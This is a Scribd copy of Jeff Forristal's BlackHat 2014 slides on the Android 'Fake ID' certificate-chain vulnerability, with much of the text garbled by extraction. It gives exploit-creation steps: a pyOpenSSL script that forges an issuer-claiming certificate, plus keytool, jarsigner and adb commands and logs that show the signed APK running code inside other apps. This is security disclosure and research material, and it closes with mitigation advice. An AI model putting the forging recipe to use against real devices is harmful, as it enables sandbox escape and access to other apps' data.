Scribd Logo
Upload

Welcome to Scribd!

  • Us 14 Forristal Android FakeID Vulnerability Walkthrough

    Uploaded by

    th3.pil0t
    94 views36 pages
    This document summarizes Jeff Forristal's presentation on the "Android Fake ID" vulnerability at BlackHat 2014. It discusses how Android applications are signed with certificates and how the signature validation logic can be exploited. By constructing a fake certificate chain with a trusted root, an attacker can sign a malicious application to bypass security restrictions and gain access to privileged APIs or data normally restricted to other applications. Several examples are provided of components that were vulnerable, including the WebView plugin manager and NFC access. The steps to create an exploit application demonstrating this are also outlined.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes Jeff Forristal's presentation on the "Android Fake ID" vulnerability at BlackHat 2014. It discusses how Android applications are signed with certificates and how the signature validation logic can be exploited. By constructing a fake certificate chain with a trusted root, an attacker can sign a malicious application to bypass security restrictions and gain access to privileged APIs or data normally restricted to other applications. Several examples are provided of components that were vulnerable, including the WebView plugin manager and NFC access. The steps to create an exploit application demonstrating this are also outlined.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    94 views36 pages

    Us 14 Forristal Android FakeID Vulnerability Walkthrough

    Uploaded by

    th3.pil0t
    This document summarizes Jeff Forristal's presentation on the "Android Fake ID" vulnerability at BlackHat 2014. It discusses how Android applications are signed with certificates and how the signature validation logic can be exploited. By constructing a fake certificate chain with a trusted root, an attacker can sign a malicious application to bypass security restrictions and gain access to privileged APIs or data normally restricted to other applications. Several examples are provided of components that were vulnerable, including the WebView plugin manager and NFC access. The steps to create an exploit application demonstrating this are also outlined.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 36

    Android Fake ID

    Vulnerability
    Jeff Forristal / Bluebox
    BlackHat US 2014
    Jeff Forristal / Bluebox
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    !as"rkey
    Jeff Forristal, CTO of Bluebox Security

    Discovered Android Masterkey vulnerability in 2013

    Contributing to the security industry for 15+ years
    Jeff Forristal / Bluebox
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    bug# 13678484
    lL ls a:
    Sandbox escape
    usable by malware
    Capable of accesslng daLa, web Lramc of oLher apps
    Can access nlC hardware whlle belng used by Coogle WalleL
    WorsL case: full sysLem compromlse
    All by presenting a fake identication to an app
    A.k.a. the Fake ID vulnerability
    Jeff Forristal / Bluebox
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Application
    Identities /
    Signatures
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Android applications are signed
    The signature is the base of multiple security features
    Signatures
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    0101010101010
    1010101010101
    0101010101010
    1010101010101
    0101010101010
    Sub[ecL: devel
    lssuer: devel
    ubllc key:
    1010101010101
    0101010101010
    Opaque
    Signature
    Public
    Certicate
    PKCS7
    Object
    Signatures
    *.SF
    Manifest
    *.MF
    AsseLs
    ManlfesL
    Classes.dex
    8esources
    xML
    Application
    APK
    llle: hash
    llle: hash
    llle: hash
    llle: hash
    llle: hash
    llle: hash
    llle: hash
    llle: hash
    llle: hash
    llle: hash
    Lnvelope
    CerucaLe
    SlgnaLure
    Hierarchy
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Sub[ecL: www.bluebox.com
    -- 8LCln 8lvA1L kL? ---
    .
    -- 8LCln u8LlC kL? ---
    .
    PKI Certicates
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Sub[ecL: www.bluebox.com
    -- 8LCln 8lvA1L kL? ---
    .
    Sub[ecL: verlslgn CA
    -- 8LCln u8LlC kL? ---
    .
    -- 8LCln 8lvA1L kL? ---
    .
    -- 8LCln u8LlC kL? ---
    .
    PKI Certicates
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Sub[ecL: www.bluebox.com
    lssuer: verlslgn CA
    lssuer SlgnaLure: cryp$
    -- 8LCln u8LlC kL? ---
    .
    -- 8LCln 8lvA1L kL? ---
    .
    Sub[ecL: verlslgn CA
    -- 8LCln 8lvA1L kL? ---
    .
    -- 8LCln u8LlC kL? ---
    .
    PKI Issuing
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Sub[ecL: www.bluebox.com
    lssuer SlgnaLure: cryp$
    -- 8LCln 8lvA1L kL? ---
    .
    Sub[ecL: verlslgn CA
    -- 8LCln 8lvA1L kL? ---
    .
    lssuer: verlslgn CA
    -- 8LCln u8LlC kL? ---
    .
    -- 8LCln u8LlC kL? ---
    .
    PKI Verication
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Sub[ecL: www.bluebox.com
    lssuer SlgnaLure: cryp$
    -- 8LCln 8lvA1L kL? ---
    .
    Sub[ecL: verlslgn CA
    lssuer SlgnaLure: cryp$
    -- 8LCln 8lvA1L kL? ---
    .
    lssuer: verlslgn CA
    -- 8LCln u8LlC kL? ---
    .
    lssuer: verlslgn CA
    -- 8LCln u8LlC kL? ---
    .
    PKI Self-Signed
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Sub[ecL: cllenL
    lssuer SlgnaLure
    lssuer: SubCA1
    ubllc key
    PKI Chaining
    Sub[ecL: SubCA1
    lssuer SlgnaLure
    lssuer: SubCA2
    ubllc key
    Sub[ecL: SubCA2
    lssuer SlgnaLure
    lssuer: CA
    ubllc key
    Sub[ecL: CA
    lssuer SlgnaLure
    lssuer: CA
    ubllc key
    Immediate identity / signer
    Trusted root certicate
    Jeff Forristal / Bluebox
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Vulnerability
    Mechanics
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Applications attempt to verify the signing
    of other applications

    PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES )
    Signatures[] signatures = pkgInfo.signatures;

    for (Signature sig : signatures ) {
    if ( sig.equals( TRUSTED_SIGNATURE ) ) {
    // trusted signature found, trust the application
    }
    }

    Trust Checking
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Trust Checking
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Opportunity
    The logic accepts a trusted
    certicate anywhere in
    signature /certicate chain
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Chain Construction
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Chain Construction
    1. Verify signature with signer cert

    2. Create a chain based on valid
    signer cert

    3. Get the certs issuer

    4. Find an included cert where
    included cert subject == previous
    certs issuer

    5. Add that cert to the chain
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Sub[ecL: cllenL
    lssuer SlgnaLure
    lssuer: SubCA1
    ubllc key
    PKI Chaining - Android
    Sub[ecL: SubCA1
    lssuer SlgnaLure
    lssuer: SubCA2
    ubllc key
    Sub[ecL: SubCA2
    lssuer SlgnaLure
    lssuer: CA
    ubllc key
    Sub[ecL: CA
    lssuer SlgnaLure
    lssuer: CA
    ubllc key
    ? ? ?
    A certicate can claim to be issued by
    any other certicate
    and that claim is
    not veried
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    This code can now be easily attacked / bypassed

    PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES )
    Signatures[] signatures = pkgInfo.signatures;

    for (Signature sig : signatures ) {
    if ( sig.equals( TRUSTED_SIGNATURE ) ) {
    // trusted signature found, trust the application
    }
    }

    Impact
    Jeff Forristal / Bluebox
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Exploitation
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Targets
    Review all uses of
    signatures in AOSP

    Further review
    of select third-party
    components involving
    extra privileges
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Targets - Examples
    Webview plugin manager (all AOSP <= 4.3)
    Plugins signed by Adobe (Flash) reloaded into any/all apps using
    framework webview
    NFC access.xml (all AOSP)
    Match a package signature wildcard (Google Wallet), get access to
    NFC secure element

    3LM device management extensions (assorted devices)
    Former Google/Motorola technology, included with older devices
    LG MDM device extensions (LG devices)
    System functions available to apps signed by LG platform signature

    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Sub[ecL: LrusLed_cerL
    lssuer SlgnaLure
    lssuer: LrusLed_cerL
    ubllc key
    1. Create APK with exploit
    payload suitable for target
    2. Isolate trusted certicate

    3. Generate a new certicate

    4. Set issuer to trusted certicate

    5. Package all of it (new cert +
    target cert as a CA cert) into a
    PKCS12 le

    6. Use the PKCS12 for exploit
    APK signing
    Sub[ecL: arblLrary
    lssuer SlgnaLure (broken)
    lssuer: LrusLed_cerL
    ubllc key

    targetcert = OpenSSL.crypto.load_certicate( target )
    pk = OpenSSL.crypto.PKey()
    pk.generate_key( OpenSSL.crypto.TYPE_RSA, 1024)
    newcert = OpenSSL.crypto.X509()
    newcert.get_subject().CN = arbitrary
    newcert.set_issuer( targetcert.get_subject() )
    newcert.set_pubkey( pk )
    newcert.sign( pk, sha1 )
    pkcs12 = OpenSSL.crypto.PKCS12()
    pkcs12.set_privatekey( pk )
    pkcs12.set_certicate( cert )
    pkcs12.set_ca_certicates( [targetcert] )
    nalPkcs12Data = pkcs12.export( passphrase=1234 )

    Exploit Creation
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    BONUS
    Exploit Creation
    An APK supports being signed by multiple
    independent signers
    You can repeat signing with as many trusted
    certicates as you care to include
    Thus one exploit can carry
    exploits for multiple targets at same time
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Crafting
    [e$ openssl x309 -ln webklL_plugln.pem -noouL -LexL | grep Sub[ecL:
    Sub[ecL: C=uS, S1=Callfornla, L=San !ose, C=Adobe SysLems lncorporaLed, Cu=.

    [e$ pyLhon newcerL.py webklL_plugln.pem

    [e$ openssl x309 -ln ouL.cerL -noouL -LexL
    CerucaLe:
    uaLa:
    verslon: 1 (0x0)
    Serlal number: 976234362 (0x3a302842)
    SlgnaLure AlgorlLhm: sha1WlLh8SALncrypuon
    lssuer: C=uS, S1=Callfornla, L=San !ose, C=Adobe SysLems lncorporaLed, Cu=.
    valldlLy
    noL 8efore: !un 30 23:44:40 2014 CM1
    noL Aer : !un 23 23:44:40 2034 CM1
    Sub[ecL: Cn=labs.bluebox.com
    Sub[ecL ubllc key lnfo:
    ubllc key AlgorlLhm: rsaLncrypuon
    8SA ubllc key: (1024 blL)
    Modulus (1024 blL):
    00:b4:df:2d:33:9a:f2:8f:61:99:bc:36:19:37:76:
    .
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Crafting
    [e$ keyLool -v -lmporLkeysLore -srckeysLore ouL.pkcs12 -srcsLoreLype kCS12 \
    -desLkeysLore evll.keysLore -desLsLoreLype !kS

    LnLer desunauon keysLore password:
    8e-enLer new password:
    LnLer source keysLore password:
    LnLry for allas 1 successfully lmporLed.
    lmporL command compleLed: 1 enLrles successfully lmporLed, 0 enLrles falled or cancelled
    [SLorlng evll.keysLore]



    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Crafting
    [e$ [arslgner -verbose -slgalg SPA1wlLh8SA -dlgesLalg SPA1 -keysLore evll.keysLore \
    8luebox_SampleWebklLlugln.apk 1

    LnLer assphrase for keysLore:
    LnLer key password for 1:
    addlng: ML1A-lnl/MAnllLS1.Ml
    addlng: ML1A-lnl/1.Sl
    addlng: ML1A-lnl/1.8SA
    slgnlng: AndroldManlfesL.xml
    slgnlng: classes.dex
    slgnlng: llb/armeabl-v7a/llbsampleplugln3.so
    slgnlng: res/drawable-mdpl/lc_launcher.png
    slgnlng: res/drawable-mdpl/sample_browser_plugln.png
    slgnlng: res/layouL/acuvlLy_maln.xml
    slgnlng: res/menu/maln.xml
    slgnlng: resources.arsc
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Fingers Crossed
    [e$ adb lnsLall 8luebox_SampleWebklLlugln.apk
    1163 k8/s (39864 byLes ln 0.033s)
    pkg: /daLa/local/Lmp/8luebox_SampleWebklLlugln.apk
    Success

    l/ackageManager( 433): 8unnlng dexopL on: com.bluebox.labs.chalnbreak.demo
    u/dalvlkvm(11123): uexCpL: load 23ms, verlfy+opL 6ms, 282884 byLes
    l/AcuvlLyManager( 433): lorce sLopplng package com.bluebox.labs.chalnbreak.demo appld=10083
    user=-1
    W/ackageManager( 433): unknown permlsslon androld.webklL.permlsslon.LuCln ln package
    com.bluebox.labs.chalnbreak.demo
    l/lugln ( 8109): 8luebox runnlng code ln Lhls process!
    l/lugln ( 8109): -- uld=10077, pld=8109, process=com.mlcroso.skydrlve
    l/lugln ( 3138): 8luebox runnlng code ln Lhls process!
    l/lugln ( 3138): -- uld=10034, pld=3138, process=com.google.androld.googlequlcksearchbox:search
    l/lugln (10166): 8luebox runnlng code ln Lhls process!
    l/lugln (10166): -- uld=10081, pld=10166, process=com.salesforce.chauer

    Jeff Forristal / Bluebox
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Live Demo
    Jeff Forristal / Bluebox
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Mitigation
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Patched, sent to OHA partners get your OTAs
    in the usual manner (if ever)
    BTW, released to public repo May 21st
    Patches
    Jeff Forristal / Bluebox
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Bluebox
    Security
    Scanner
    (free)
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Stick to known sources for your applications

    Android 4.4 (KitKat) + is immune to Flash webkit plugin
    (KitKat replaced webkit webview with chromium)

    Check your (older) device for 3LM extensions
    (adb shell getprop | grep ro.3lm.production)

    Beware of who asks for Device Admin access
    (Settings -> Security -> Device Administrators)
    Hygiene
    BLACKHAT 20:14 FORRISTAL ANDROID FAKE ID
    Afterthought
    Thanks
    jeff@bluebox.com
    http://bluebox.com/blog

    You might also like